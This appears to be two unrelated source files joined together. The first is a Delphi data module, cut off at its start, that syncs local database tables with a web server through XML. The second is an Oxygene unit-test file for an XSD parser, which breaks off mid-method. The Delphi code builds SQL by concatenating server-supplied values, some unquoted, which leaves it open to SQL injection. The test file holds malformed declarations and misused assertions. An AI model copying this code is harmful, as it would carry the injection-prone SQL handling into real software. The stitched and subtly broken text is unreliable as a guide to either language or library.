TField; nestedAttribute: string = ''; fkName: string = ''): string; virtual; function translateValueFromServer(fieldName, value: string): string; virtual; procedure redirectRecord(idAntigo, idNovo: integer); function getFieldAdditionalList(node: IXMLDomNode): string; virtual; function getFieldAdditionalValues(node: IXMLDomNode): string; virtual; function getFieldAdditionalUpdateList(node: IXMLDomNode): string; virtual; function nomeActionSave: string; virtual; function nomeActionGet: string; virtual; function nomeSingularSave: string; virtual; function nomeSingularGet: string; virtual; procedure updateSingletonRecord(node: IXMLDOMNode); function getOrderBy: string; virtual; procedure addMoreParams(ds: TDataSet; params: TStringList); virtual; procedure prepareMultipartParams(ds: TDataSet; multipartParams: TIdMultiPartFormDataStream); virtual; abstract; function singleton: boolean; function getUpdateBaseSQL(node: IXMLDOMNode): string; procedure addDetails(ds: TDataSet; params: TStringList); function addTranslatedParams(ds: TDataSet; params: TStringList; translations: TTranslationSet; nestedAttribute: string = ''): IXMLDomDocument2; function getAdditionalSaveConditions: string; virtual; procedure beforeUpdateRecord(id: integer); virtual; function gerenciaRedirecionamentos(idLocal, idRemoto: integer): boolean; virtual; function getNewDataPrincipal: IDataPrincipal; virtual; abstract; function maxRecords: integer; virtual; function getTimeoutValue: integer; virtual; function getDateFormat: String; virtual; function getAdditionalDetailFilter:String; virtual; function shouldContinue: boolean; procedure onDetailNamesMalformed(configName, tableName: string); virtual; function getIncludeFieldNameOnList(const aDMLOperation: TDMLOperation; const aFieldName: string): boolean; virtual; function getObjectsList: string; virtual; function getUpdateStatement(node: IXMLDomNode; const id: integer): String; virtual; function getInsertStatement(node: IXMLDomNode): String; virtual; function getNewId: Integer; virtual; abstract; function post(ds: TDataSet; http: TidHTTP; url: string): string; virtual; public translations: TTranslationSet; verbose: boolean; property notifier: ISincronizacaoNotifier read Fnotifier write Fnotifier; property threadControl: IThreadControl read FthreadControl write SetthreadControl; property CustomParams: ICustomParams read FCustomParams write FCustomParams; property dmPrincipal: IDataPrincipal read getdmPrincipal write SetdmPrincipal; property stopOnPostRecordError: boolean read FstopOnPostRecordError write FstopOnPostRecordError; function buildRequestURL(nomeRecurso: string; params: string = ''; httpAction: THttpAction = haGet): string; virtual; abstract; procedure getDadosAtualizados(http: TIdHTTP = nil); function saveRecordToRemote(ds: TDataSet; var salvou: boolean; http: TidHTTP = nil): IXMLDomDocument2; procedure migrateSingletonTableToRemote; procedure postRecordsToRemote(http: TidHTTP = nil); virtual; class procedure updateDataSets; virtual; procedure afterDadosAtualizados; virtual; function getHumanReadableName: string; virtual; property DataLog: ILog read FDataLog write SetDataLog; destructor Destroy; override; end; TDataIntegradorModuloWebClass = class of TDataIntegradorModuloWeb; var DataIntegradorModuloWeb: TDataIntegradorModuloWeb; implementation uses AguardeFormUn, ComObj; {$R *.dfm} function TDataIntegradorModuloWeb.extraGetUrlParams: String; begin result := ''; end; function TDataIntegradorModuloWeb.getObjectsList: string; begin Result := '/' + dasherize(nomePlural) + '//' + dasherize(nomeSingular); end; procedure TDataIntegradorModuloWeb.getDadosAtualizados(http: TIdHTTP = nil); var url, xmlContent: string; doc: IXMLDomDocument2; list : IXMLDomNodeList; i, numRegistros: integer; node : IXMLDomNode; keepImporting: boolean; begin keepImporting := true; while keepImporting do begin if (not self.shouldContinue) then Break; url := getRequestUrlForAction(false, ultimaVersao) + extraGetUrlParams; if notifier <> nil then notifier.setCustomMessage('Buscando ' + getHumanReadableName + '...'); log('Iniciando busca classe: ' + self.ClassName, 'Sync'); numRegistros := 0; xmlContent := getRemoteXmlContent(url, http); if trim(xmlContent) <> '' then begin doc := CoDOMDocument60.Create; doc.loadXML(xmlContent); list := doc.selectNodes(Self.getObjectsList); numRegistros := list.length; if notifier <> nil then notifier.setCustomMessage(IntToStr(numRegistros) + ' novos'); for i := 0 to numRegistros-1 do begin if (not self.shouldContinue) then Break; if notifier <> nil then notifier.setCustomMessage('Importando ' + getHumanReadableName + ': ' + IntToStr(i+1) + '/' + IntToStr(numRegistros)); node := list.item[i]; if node<>nil then importRecord(node); end; end; keepImporting := (maxRecords > 0) and (numRegistros >= maxRecords); end; afterDadosAtualizados; end; function TDataIntegradorModuloWeb.getHumanReadableName: string; begin result := ClassName; end; function TDataIntegradorModuloWeb.maxRecords: integer; begin result := 0; end; procedure TDataIntegradorModuloWeb.importRecord(node : IXMLDomNode); var id: integer; statement: string; begin if not singleton then begin id := strToIntDef(node.selectSingleNode(dasherize(nomePKRemoto)).text, -1); if id >= 0 then begin dmPrincipal.startTransaction; try if jaExiste(id) then begin statement := Self.GetUpdateStatement(node, id); Self.updateRecord(statement, id); end else begin statement := Self.getInsertStatement(node); insertRecord(statement); end; dmPrincipal.commit; except on E:Exception do begin dmPrincipal.rollBack; if Self.DataLog <> nil then Self.DataLog.log(Format('Erro ao importar a tabela "%s": "%s". '+ #13#10 + 'Comando: "%s"', [self.nomeTabela, e.Message, statement])); end; end; end; end else updateSingletonRecord(node); end; function TDataIntegradorModuloWeb.shouldContinue: boolean; begin Result := true; if Self.FThreadControl <> nil then result := Self.FThreadControl.getShouldContinue; end; function TDataIntegradorModuloWeb.singleton: boolean; begin result := (nomePKLocal = '') and (nomePKRemoto = ''); end; function TDataIntegradorModuloWeb.jaExiste(id: integer): boolean; var qry: string; begin if duasVias then qry := 'SELECT count(1) FROM ' + nomeTabela + ' where idRemoto = ' + IntToStr(id) else qry := 'SELECT count(1) FROM ' + nomeTabela + ' where ' + nomePKLocal + ' = ' + IntToStr(id); result := dmPrincipal.getSQLIntegerResult(qry) > 0; end; procedure TDataIntegradorModuloWeb.beforeUpdateRecord(id: integer); begin end; function TDataIntegradorModuloWeb.getUpdateStatement(node: IXMLDomNode; const id: integer): String; begin if duasVias then Result := getUpdateBaseSQL(node) + ' WHERE idRemoto = ' + IntToStr(id) else Result := getUpdateBaseSQL(node) + ' WHERE ' + nomePKLocal + ' = ' + IntToStr(id); end; function TDataIntegradorModuloWeb.getInsertStatement(node: IXMLDomNode): String; begin Result := 'INSERT INTO ' + nomeTabela + getFieldList(node) + ' values ' + getFieldValues(node); end; procedure TDataIntegradorModuloWeb.updateRecord(const aUpdateStatement: string; const id: integer); begin beforeUpdateRecord(id); dmPrincipal.execSQL(aUpdateStatement); end; procedure TDataIntegradorModuloWeb.UpdateRecordDetalhe(pNode: IXMLDomNode; pTabelasDetalhe : array of TTabelaDetalhe); var i,j : integer; vNode : IXMLDomNode; vNodeList, List: IXMLDOMNodeList; vIdRemoto, vPkLocal : String; vNomePlural, vNomeSingular: string; begin try for i := low(pTabelasDetalhe) to high(pTabelasDetalhe) do begin vNomePlural := pTabelasDetalhe[i].nomePluralDetalhe; vNomeSingular := pTabelasDetalhe[i].nomeSingularDetalhe; if VNomePlural = EmptyStr then begin onDetailNamesMalformed(pTabelasDetalhe[i].nomeTabela, 'NomePlural'); exit; end; if vNomeSingular = EmptyStr then begin onDetailNamesMalformed(pTabelasDetalhe[i].nomeTabela, 'NomeSingular'); exit; end; vNode := pNode.selectSingleNode('./' + dasherize(vNomePlural)); vNodeList := vNode.selectNodes('./' + dasherize(vNomeSingular)); for j := 0 to vNodeList.length - 1 do begin vIdRemoto := vNodeList[j].selectSingleNode('./id').text; vPkLocal := vNodeList[j].selectSingleNode('./original-id').text; if duasVias then dmPrincipal.execSQL('UPDATE ' + pTabelasDetalhe[i].nomeTabela + ' SET salvouRetaguarda = ' + QuotedStr('S') + ', idRemoto = ' + vIdRemoto + ' WHERE salvouRetaguarda = ''N'' and ' + pTabelasDetalhe[i].nomePK + ' = ' + vPkLocal) ; end; if (Length(pTabelasDetalhe[i].tabelasDetalhe) > 0) and (vNode <> nil) then Self.UpdateRecordDetalhe(vNode, pTabelasDetalhe[i].tabelasDetalhe); end; except raise; end; end; procedure TDataIntegradorModuloWeb.updateSingletonRecord(node: IXMLDOMNode); begin if dmPrincipal.getSQLIntegerResult('SELECT count(1) from ' + nomeTabela) < 1 then dmPrincipal.execSQL('Insert into ' + nomeTabela + ' DEFAULT VALUES'); dmPrincipal.execSQL(getUpdateBaseSQL(node)); end; function TDataIntegradorModuloWeb.getUpdateBaseSQL(node: IXMLDOMNode): string; begin result := 'UPDATE ' + nomeTabela + getFieldUpdateList(node); end; procedure TDataIntegradorModuloWeb.insertRecord(const aInsertStatement: string); begin dmPrincipal.execSQL(aInsertStatement); end; function TDataIntegradorModuloWeb.getFieldList(node: IXMLDomNode): string; var i: integer; name: string; begin result := '('; if duasVias and ((nomeGenerator <> '') or (usePKLocalMethod)) then result := result + nomePKLocal + ', '; if duasVias then result := result + 'salvouRetaguarda, '; for i := 0 to node.childNodes.length - 1 do begin name := translateFieldNameServerToPdv(node.childNodes.item[i]); if name <> '*' then if Self.getIncludeFieldNameOnList(dmInsert, name) then result := result + name + ', '; end; result := copy(result, 0, length(result)-2); result := result + getFieldAdditionalList(node); result := result + ')'; end; function TDataIntegradorModuloWeb.getFieldValues(node: IXMLDomNode): string; var i: integer; name: string; begin result := '('; if duasVias and ((nomeGenerator <> '') or (usePKLocalMethod)) then begin if nomeGenerator <> '' then result := result + 'gen_id(' + nomeGenerator + ',1), ' else Result := Result + IntToStr(getNewId) + ', '; end; if duasVias then result := result + QuotedStr('S') + ', '; for i := 0 to node.childNodes.length - 1 do begin name := translateFieldNameServerToPdv(node.childNodes.item[i]); if name <> '*' then if Self.getIncludeFieldNameOnList(dmInsert, name) then result := result + translateFieldValue(node.childNodes.item[i]) + ', '; end; result := copy(result, 0, length(result)-2); result := result + getFieldAdditionalValues(node); result := result + ')'; end; function TDataIntegradorModuloWeb.getFieldUpdateList(node: IXMLDomNode): string; var i: integer; name: string; begin result := ' set '; for i := 0 to node.childNodes.length - 1 do begin name := translateFieldNameServerToPdv(node.childNodes.item[i]); if name <> '*' then if Self.getIncludeFieldNameOnList(dmUpdate, name) then result := result + ' ' + translateFieldNameServerToPdv(node.childNodes.item[i]) + ' = ' + translateFieldValue(node.childNodes.item[i]) + ', '; end; result := copy(result, 0, length(result)-2); result := result + getFieldAdditionalUpdateList(node); end; function TDataIntegradorModuloWeb.getIncludeFieldNameOnList(const aDMLOperation: TDMLOperation; const aFieldName: string): boolean; begin Result := True; end; function TDataIntegradorModuloWeb.getRequestUrlForAction(toSave: boolean; versao: integer = -1): string; var nomeRecurso: string; begin if toSave then begin nomeRecurso := nomeActionSave; Result := buildRequestURL(nomeRecurso, '', haPost); end else begin nomeRecurso := nomeActionGet; Result := buildRequestURL(nomeRecurso); end; if versao > -1 then result := result + '&version=' + IntToStr(versao); end; function TDataIntegradorModuloWeb.ultimaVersao: integer; begin result := dmPrincipal.getSQLIntegerResult('Select max('+self.getVersionFieldName+') from ' + nomeTabela); end; function TDataIntegradorModuloWeb.getVersionFieldName: string; begin Result := 'versao'; end; function TDataIntegradorModuloWeb.translateFieldValue( node: IXMLDomNode): string; var typedTranslate: string; begin if (node.attributes.getNamedItem('nil') <> nil) and (node.attributes.getNamedItem('nil').text = 'true') then result := 'NULL' else if (node.attributes.getNamedItem('type') <> nil) then begin typedTranslate := translateTypeValue(node.attributes.getNamedItem('type').text, node.text); result := translateValueFromServer(node.nodeName, typedTranslate); end else result := QuotedStr(translateValueFromServer(node.nodeName, node.text)); end; function TDataIntegradorModuloWeb.translateTypeValue(fieldType, fieldValue: string): string; begin result := QuotedStr(fieldValue); if fieldType = 'integer' then result := fieldValue else if fieldType = 'boolean' then begin if fieldValue = 'true' then result := '1' else result := '0'; end; end; function TDataIntegradorModuloWeb.translateFieldNameServerToPdv( node: IXMLDomNode): string; begin result := translations.translateServerToPDV(node.nodeName, duasVias); if result = '' then result := StringReplace(node.nodeName, '-', '', [rfReplaceAll]); end; function TDataIntegradorModuloWeb.translateFieldNamePdvToServer( node: IXMLDomNode): string; begin result := translations.translatepdvToServer(node.nodeName); if result = '' then result := StringReplace(node.nodeName, '-', '', [rfReplaceAll]); end; function TDataIntegradorModuloWeb.addTranslatedParams(ds: TDataSet; params: TStringList; translations: TTranslationSet; nestedAttribute: string = ''): IXMLDomDocument2; var i: integer; nestingText, nomeCampo, nome, valor: string; begin nestingText := ''; if nestedAttribute <> '' then nestingText := '[' + nestedAttribute + '][]'; for i := 0 to translations.size-1 do begin nomeCampo := translations.get(i).pdv; if ds.FindField(nomeCampo) <> nil then begin nome := nomeSingularSave + nestingText + '[' + translations.get(i).server + ']'; valor := translateValueToServer(translations.get(i), translations.get(i).pdv, ds.fieldByName(translations.get(i).pdv), nestedAttribute, translations.get(i).fkName); //params.Add(nome + '=' + TIdURI.ParamsEncode(valor)); params.Add(nome + '=' + valor); end; end; end; procedure TDataIntegradorModuloWeb.afterDadosAtualizados; begin // end; function TDataIntegradorModuloWeb.getTimeoutValue: integer; begin Result := 30000; end; procedure TDataIntegradorModuloWeb.OnWorkHandler(ASender: TObject; AWorkMode: TWorkMode; AWorkCount: Int64); begin if (Self.FthreadControl <> nil) and (not Self.FthreadControl.getShouldContinue) then Abort; end; function TDataIntegradorModuloWeb.post(ds: TDataSet; http: TidHTTP; url: string): string; var params: TStringList; pStream: TStringStream; begin result := ''; if paramsType = ptParam then begin params := TStringList.Create; try addTranslatedParams(ds, params, translations); addDetails(ds, params); addMoreParams(ds, params); result := http.Post(url, Params); finally params.Free; end; end; if paramsType = ptJSON then begin pStream := TStringStream.Create; try //TODO buscar este pStrem já como JSON //Params.SaveToStream(pStream, TEncoding.UTF8); result := http.Post(url, pStream); finally pStream.Free; end; end; end; function TDataIntegradorModuloWeb.saveRecordToRemote(ds: TDataSet; var salvou: boolean; http: TidHTTP = nil): IXMLDomDocument2; var multipartParams: TidMultipartFormDataStream; xmlContent: string; doc: IXMLDomDocument2; idRemoto: integer; txtUpdate: string; sucesso: boolean; strs, stream: TStringStream; url: string; criouHttp: boolean; log: string; begin Self.log('Iniciando save record para remote. Classe: ' + ClassName, 'Sync'); salvou := false; criouHTTP := false; idRemoto := -1; if http = nil then begin criouHTTP := true; http := getHTTPInstance; http.OnWork := Self.OnWorkHandler; http.ConnectTimeout := Self.getTimeoutValue; http.ReadTimeout := Self.getTimeoutValue; end; try sucesso := false; while (not sucesso) do begin if (Self.FthreadControl <> nil) and (not Self.FthreadControl.getShouldContinue) then break; try if useMultipartParams then begin multiPartParams := TIdMultiPartFormDataStream.Create; try stream := TStringStream.Create(''); prepareMultipartParams(ds, multipartParams ); http.Post(getRequestUrlForAction(true, -1), multipartParams, stream); xmlContent := stream.ToString; finally MultipartParams.Free; end; end else begin url := getRequestUrlForAction(true, -1); xmlContent := post(ds, http, url); end; sucesso := true; CoInitialize(nil); try doc := CoDOMDocument60.Create; doc.loadXML(xmlContent); result := doc; finally CoUninitialize; end; if duasVias or clientToServer then begin txtUpdate := 'UPDATE ' + nomeTabela + ' SET salvouRetaguarda = ' + QuotedStr('S'); if duasVias then begin if doc.selectSingleNode('//' + dasherize(nomeSingularSave) + '//id') <> nil then idRemoto := strToInt(doc.selectSingleNode('//' + dasherize(nomeSingularSave) + '//id').text) else idRemoto := StrToInt(doc.selectSingleNode('objects').selectSingleNode('object').selectSingleNode('id').text); if idRemoto > 0 then txtUpdate := txtUpdate + ', idRemoto = ' + IntToStr(idRemoto); end; txtUpdate := txtUpdate + ' WHERE coalesce(salvouRetaguarda, ''N'') = ''N'' and ' + nomePKLocal + ' = ' + ds.fieldByName(nomePKLocal).AsString; //da a chance da classe gerenciar redirecionamentos, por exemplo ao descobrir que este registro já //existia no remoto e era outro registro neste banco de dados. if not gerenciaRedirecionamentos(ds.fieldByName(nomePKLocal).AsInteger, idRemoto) then begin dmPrincipal.startTransaction; dmPrincipal.execSQL(txtUpdate); dmPrincipal.commit; end; if (Length(TabelasDetalhe) > 0) and (doc.selectSingleNode(dasherize(nomeSingularSave)) <> nil) then Self.UpdateRecordDetalhe(doc.selectSingleNode(dasherize(nomeSingularSave)), TabelasDetalhe); end; except on e: EIdHTTPProtocolException do begin if e.ErrorCode = 422 then log := Format('Erro ao tentar salvar registro. Classe: %s, Código de erro: %d, Erro: %s.',[ClassName, e.ErrorCode, Self.GetErrorMessage(e.ErrorMessage)]) else if e.ErrorCode = 500 then log := Format('Erro ao tentar salvar registro. Classe: %s, Código de erro: %d. Erro: Erro interno no servidor. ',[ClassName, e.ErrorCode]) else log := Format('Erro ao tentar salvar registro. Classe: %s, Código de erro: %d. Erro: %s.',[ClassName, e.ErrorCode, e.ErrorMessage]); Self.log(log, 'Sync'); raise EIntegradorException.Create(log) ; //Logou, agorra manda pra cima end; on E: Exception do begin log := 'Erro ao tentar salvar registro. Classe: ' + ClassName + '. Erro: ' + e.Message; Self.log(log, 'Sync'); raise EIntegradorException.Create(log) ; end; end; end; salvou := sucesso; finally if criouHttp then FreeAndNil(http); end; end; procedure TDataIntegradorModuloWeb.Log(const aLog: string; aClasse: string = ''); begin if (FDataLog <> nil) then FDataLog.log(aLog, aClasse); end; procedure TDataIntegradorModuloWeb.SetDataLog(const Value: ILog); begin FDataLog := Value; end; function TDataIntegradorModuloWeb.GetErrorMessage(const aXML: string): string; var node: IXMLNode; list: IXMLNodeList; XML: IXMLDocument; begin Result := EmptyStr; if Trim(aXML) <> EmptyStr then begin CoInitialize(nil); XML := TXMLDocument.Create(Self); try XML.LoadFromXML(aXML); list := XML.ChildNodes; if list.FindNode('errors') <> nil then begin list := list.FindNode('errors').ChildNodes; if list <> nil then begin node := list.FindNode('error'); if node <> nil then Result := node.Text; end; end; finally CoUninitialize; end; end; end; procedure TDataIntegradorModuloWeb.addDetails(ds: TDataSet; params: TStringList); var i : integer; begin for i := low(tabelasDetalhe) to high(tabelasDetalhe) do addTabelaDetalheParams(ds.fieldByName(nomePKLocal).AsInteger, params, tabelasDetalhe[i]); end; procedure TDataIntegradorModuloWeb.addTabelaDetalheParams(valorPK: integer; params: TStringList; tabelaDetalhe: TTabelaDetalhe); var qry: TSQLDataSet; i: integer; begin qry := dmPrincipal.getQuery; try qry.commandText := 'SELECT * FROM ' + tabelaDetalhe.nomeTabela + ' where ' + tabelaDetalhe.nomeFK + ' = ' + IntToStr(valorPK) + self.getAdditionalDetailFilter; qry.Open; while not qry.Eof do begin addTranslatedParams(qry, params, tabelaDetalhe.translations, tabelaDetalhe.nomeParametro); for i := low(tabelaDetalhe.tabelasDetalhe) to high(tabelaDetalhe.tabelasDetalhe) do addTabelaDetalheParams(qry.fieldByName(tabelaDetalhe.nomePK).AsInteger, params, tabelaDetalhe.tabelasDetalhe[i]); qry.Next; end; finally FreeAndNil(qry); end; end; function TDataIntegradorModuloWeb.getAdditionalDetailFilter: String; begin Result := EmptyStr; end; procedure TDataIntegradorModuloWeb.migrateSingletonTableToRemote; var qry: TSQLDataSet; salvou: boolean; begin qry := dmPrincipal.getQuery; try qry.CommandText := 'SELECT * FROM ' + nomeTabela; qry.Open; saveRecordToRemote(qry, salvou); finally FreeAndNil(qry); end; end; procedure TDataIntegradorModuloWeb.postRecordsToRemote(http: TidHTTP = nil); var qry: TSQLDataSet; salvou: boolean; n, total: integer; criouHTTP: boolean; begin criouHTTP := false; qry := dmPrincipal.getQuery; try try Self.log('Selecionando registros para sincronização. Classe: ' + ClassName, 'Sync'); qry.commandText := 'SELECT * from ' + nomeTabela + ' where ((salvouRetaguarda = ' + QuotedStr('N') + ') or (salvouRetaguarda is null)) ' + getAdditionalSaveConditions; qry.Open; total := qry.RecordCount; n := 1; if http = nil then begin criouHTTP := true; http := TIdHTTP.Create(nil); http.ProtocolVersion := pv1_1; http.HTTPOptions := http.HTTPOptions + [hoKeepOrigProtocol]; http.Request.Connection := 'keep-alive'; end; qry.First; while not qry.Eof do begin if (not self.shouldContinue) then break; if notifier <> nil then begin notifier.setCustomMessage('Salvando ' + getHumanReadableName + ' ' + IntToStr(n) + '/' + IntToStr(total)); end; inc(n); try saveRecordToRemote(qry, salvou, http); except on e: Exception do begin Self.log('Erro no processamento do postRecordsToRemote. Classe: ' + ClassName +' | '+ e.Message, 'Sync'); if stopOnPostRecordError then raise; end; end; qry.Next; end; if notifier <> nil then notifier.unflagSalvandoDadosServidor; Self.log('Commitando post de records para remote. Classe: ' + ClassName, 'Sync') except Self.log('Erro no processamento do postRecordsToRemote. Classe: ' + ClassName, 'Sync'); if stopOnPostRecordError then raise; end; finally FreeAndNil(qry); if criouHTTP and (http<>nil) then FreeAndNil(http); end; end; procedure TDataIntegradorModuloWeb.redirectRecord(idAntigo, idNovo: integer); var i: integer; nomeFK: string; begin beforeRedirectRecord(idAntigo, idNovo); //Para cada tabela que referenciava esta devemos dar o update do id antigo para o novo for i:= low(tabelasDependentes) to high(tabelasDependentes) do begin nomeFK := tabelasDependentes[i].nomeFK; if nomeFK = '' then nomeFK := nomePKLocal; dmPrincipal.execSQL('UPDATE ' + tabelasDependentes[i].nomeTabela + ' set ' + nomeFK + ' = ' + IntToStr(idNovo) + ' where ' + nomeFK + ' = ' + IntToStr(idAntigo)); dmPrincipal.refreshData; end; //E então apagar o registro original dmPrincipal.execSQL('DELETE FROM ' + nomeTabela + ' where ' + nomePKLocal + ' = ' + IntToStr(idAntigo)); end; { TTranslationSet } procedure TTranslationSet.add(serverName, pdvName: string; lookupRemoteTable: string = ''; fkName: string = ''); var tam: integer; begin tam := length(translations); SetLength(translations, tam + 1); translations[tam].server := serverName; translations[tam].pdv := pdvName; translations[tam].lookupRemoteTable := lookupRemoteTable; translations[tam].fkName := fkName; end; procedure TDataIntegradorModuloWeb.beforeRedirectRecord(idAntigo, idNovo: integer); begin // end; procedure TTranslationSet.clear; begin SetLength(translations, 0); end; constructor TTranslationSet.create(owner: TComponent); begin SetLength(translations, 0); end; function TTranslationSet.get(index: integer): TNameTranslation; begin result := translations[index]; end; function TTranslationSet.size: integer; begin result := length(translations); end; function TTranslationSet.translatePDVToServer(pdvName: string): string; var i: integer; begin result := ''; for i := low(translations) to high(translations) do if translations[i].pdv = pdvName then result := translations[i].server; end; function TTranslationSet.translateServerToPDV(serverName: string; duasVias: boolean): string; var i: integer; begin result := ''; if duasVias and (upperCase(serverName) = 'ID') then result := 'idRemoto' else for i := low(translations) to high(translations) do if translations[i].server = underscorize(serverName) then begin result := translations[i].pdv; break; end; end; procedure TDataIntegradorModuloWeb.DataModuleCreate(Sender: TObject); begin verbose := false; duasVias := false; clientToServer := false; translations := TTranslationSet.create(self); nomePKLocal := 'id'; nomePKRemoto := 'id'; SetLength(tabelasDependentes, 0); nomeGenerator := ''; usePKLocalMethod := false; useMultipartParams := false; paramsType := ptParam; FstopOnPostRecordError := true; end; destructor TDataIntegradorModuloWeb.Destroy; var i: integer; begin for i := Low(Self.tabelasDetalhe) to High(Self.tabelasDetalhe) do Self.tabelasDetalhe[i].Free; inherited; end; function TDataIntegradorModuloWeb.translateValueToServer(translation: TNameTranslation; fieldName: string; field: TField; nestedAttribute: string = ''; fkName: string = ''): string; var lookupIdRemoto: integer; fk: string; begin if translation.lookupRemoteTable <> '' then begin if (field.asInteger >= 0) and not(field.IsNull) then begin if fkName = '' then fk := translation.pdv else fk := fkName; lookupIdRemoto := dmPrincipal.getSQLIntegerResult('SELECT idRemoto FROM ' + translation.lookupRemoteTable + ' WHERE ' + fk + ' = ' + field.AsString); if lookupIdRemoto > 0 then result := IntToStr(lookupIdRemoto) else result := ''; end else result := ''; end else begin if field.DataType in [ftFloat, ftBCD, ftFMTBCD, ftCurrency] then begin try FormatSettings.DecimalSeparator := '.'; FormatSettings.ThousandSeparator := #0; result := field.AsString; finally FormatSettings.DecimalSeparator := ','; FormatSettings.ThousandSeparator := '.'; end; end else if field.DataType in [ftDateTime, ftTimeStamp] then begin if field.IsNull then result := 'NULL' else //result := FormatDateTime('yyyy-mm-dd"T"hh:nn:ss', field.AsDateTime); result := FormatDateTime(Self.getDateFormat , field.AsDateTime); end else if field.DataType in [ftDate] then begin if field.IsNull then result := 'NULL' else result := FormatDateTime('yyyy-mm-dd', field.AsDateTime); end else result := field.asString; end; end; function TDataIntegradorModuloWeb.getDateFormat: String; begin Result := 'dd"/"mm"/"yyyy"T"hh":"nn":"ss' end; function TDataIntegradorModuloWeb.translateValueFromServer(fieldName, value: string): string; begin result := value; end; function TDataIntegradorModuloWeb.getFieldAdditionalList( node: IXMLDomNode): string; begin result := ''; end; function TDataIntegradorModuloWeb.getFieldAdditionalUpdateList( node: IXMLDomNode): string; begin result := ''; end; function TDataIntegradorModuloWeb.getFieldAdditionalValues( node: IXMLDomNode): string; begin result := ''; end; function TDataIntegradorModuloWeb.nomeActionGet: string; begin result := nomePlural; end; function TDataIntegradorModuloWeb.nomeActionSave: string; begin result := nomePlural; end; function TDataIntegradorModuloWeb.nomeSingularGet: string; begin result := nomeSingular; end; function TDataIntegradorModuloWeb.nomeSingularSave: string; begin result := nomeSingular; end; procedure TDataIntegradorModuloWeb.onDetailNamesMalformed(configName, tableName: string); begin self.Log(Format('Tabela detalhe: %s da Classe: %s não possui configuração de %s',[tableName, Self.ClassName, configName])); end; function TDataIntegradorModuloWeb.getOrderBy: string; begin result := nomePKLocal; end; procedure TDataIntegradorModuloWeb.addMoreParams(ds: TDataSet; params: TStringList); begin //nothing to add here end; procedure TDataIntegradorModuloWeb.SetdmPrincipal( const Value: IDataPrincipal); begin FdmPrincipal := Value; end; procedure TDataIntegradorModuloWeb.SetthreadControl(const Value: IThreadControl); begin FthreadControl := Value; end; function TDataIntegradorModuloWeb.getdmPrincipal: IDataPrincipal; begin if FdmPrincipal = nil then begin FdmPrincipal := getNewDataPrincipal; end; result := FdmPrincipal; end; function TDataIntegradorModuloWeb.getAdditionalSaveConditions: string; begin result := ''; end; class procedure TDataIntegradorModuloWeb.updateDataSets; begin //nada a atualizar end; function TDataIntegradorModuloWeb.gerenciaRedirecionamentos(idLocal, idRemoto: integer): boolean; begin result := false; end; { TTabelaDetalhe } constructor TTabelaDetalhe.create; begin translations := TTranslationSet.create(nil); end; end.
namespace TestApplication; interface uses proholz.xsdparser, RemObjects.Elements.EUnit; type ResrictionTest = public class(TestBaseClass) private protected method Setup; override; public; begin gettestParser('test'); end; public method testIntRestrictions; method testStringRestrictions; method testAnnotations; (** * Tests a {@link XsdList} value with multiple restrictions. *) method testList; (** * Asserts if all the {@link Double} based restrictions, i.e. {@link XsdDoubleRestrictions}, parse their values * properly. *) method testDoubleRestrictions() ; method remainingTypesVerification; method testExtensionBase; end; implementation method ResrictionTest.testIntRestrictions; begin var restrictedNumberOptional:= elements //.stream() .where(element -> element.getName().equals('restrictedNumber')).First(); Assert.isNotNil(restrictedNumberOptional); var restrictedNumber: XsdElement := restrictedNumberOptional; var complexType: XsdComplexType := restrictedNumber.getXsdComplexType(); Assert.isNotNil(complexType); var attributes: List<XsdAttribute> := complexType.getXsdAttributes().toList(); Assert.IsNotNil(attributes); Assert.AreEqual(1, attributes.Count); var attribute: XsdAttribute := attributes.First; Assert.AreEqual('restrictedNumberAttr', attribute.getName()); Assert.IsNil(attribute.getType()); Assert.IsNotNil('required', attribute.getUse()); Assert.IsNotNil('restrictedNumberId', attribute.getId()); Assert.AreEqual('qualified', attribute.getForm()); Assert.AreEqual('true', attribute.getFixed()); var simpleType: XsdSimpleType := attribute.getXsdSimpleType(); Assert.IsNotNil(simpleType); var restriction: XsdRestriction := simpleType.getRestriction(); Assert.IsNotNil(restriction); var maxInclusive: XsdMaxInclusive := restriction.getMaxInclusive(); var maxExclusive: XsdMaxExclusive := restriction.getMaxExclusive(); var minInclusive: XsdMinInclusive := restriction.getMinInclusive(); var minExclusive: XsdMinExclusive := restriction.getMinExclusive(); var totalDigits: XsdTotalDigits := restriction.getTotalDigits(); var fractionDigits: XsdFractionDigits := restriction.getFractionDigits(); Assert.isNotNil(maxInclusive); Assert.isNotNil(maxExclusive); Assert.isNotNil(minInclusive); Assert.isNotNil(minExclusive); Assert.isNotNil(totalDigits); Assert.isNotNil(fractionDigits); Assert.AreEqual(100.0, maxExclusive.getValue(), 0); Assert.IsTrue(maxExclusive.isFixed()); Assert.AreEqual(0.0, minExclusive.getValue(), 0); Assert.IsTrue(minExclusive.isFixed()); Assert.AreEqual(99.0, maxInclusive.getValue(), 0); Assert.assertFalse(maxInclusive.isFixed()); Assert.AreEqual(1.0, minInclusive.getValue(), 0); Assert.assertFalse(minInclusive.isFixed()); Assert.AreEqual(2.0, fractionDigits.getValue(), 0); Assert.IsTrue(fractionDigits.isFixed()); Assert.AreEqual(10.0, totalDigits.getValue(), 0); Assert.assertFalse(totalDigits.isFixed()); end; method ResrictionTest.testStringRestrictions; begin var restrictedStringOptional := elements //.stream() .where(element -> element.getName().equals('restrictedString')).First; Assert.IsTrue(restrictedStringOptional <> nil); var restrictionString: XsdElement := restrictedStringOptional; var complexType: XsdComplexType := restrictionString.getXsdComplexType(); Assert.isNotNil(complexType); var attributes: List<XsdAttribute> := complexType.getXsdAttributes().toList(); Assert.isNotNil(attributes); Assert.AreEqual(1, attributes.Count); var attribute: XsdAttribute := attributes.First; Assert.AreEqual('restrictedStringAttr', attribute.getName()); var simpleType: XsdSimpleType := attribute.getXsdSimpleType(); Assert.isNotNil(simpleType); var restriction: XsdRestriction := simpleType.getRestriction(); Assert.isNotNil(restriction); var xsdLength: XsdLength := restriction.getLength(); var xsdMaxLength: XsdMaxLength := restriction.getMaxLength(); var xsdMinLength: XsdMinLength := restriction.getMinLength(); var xsdPattern: XsdPattern := restriction.getPattern(); var xsdWhiteSpace: XsdWhiteSpace := restriction.getWhiteSpace(); Assert.isNotNil(xsdLength); Assert.isNotNil(xsdMaxLength); Assert.isNotNil(xsdMinLength); Assert.isNotNil(xsdPattern); Assert.isNotNil(xsdWhiteSpace); Assert.AreEqual(10.0, xsdLength.getValue(), 0); Assert.IsTrue(xsdLength.isFixed()); Assert.AreEqual(10.0, xsdLength.getValue(), 0); Assert.IsTrue(xsdLength.isFixed()); 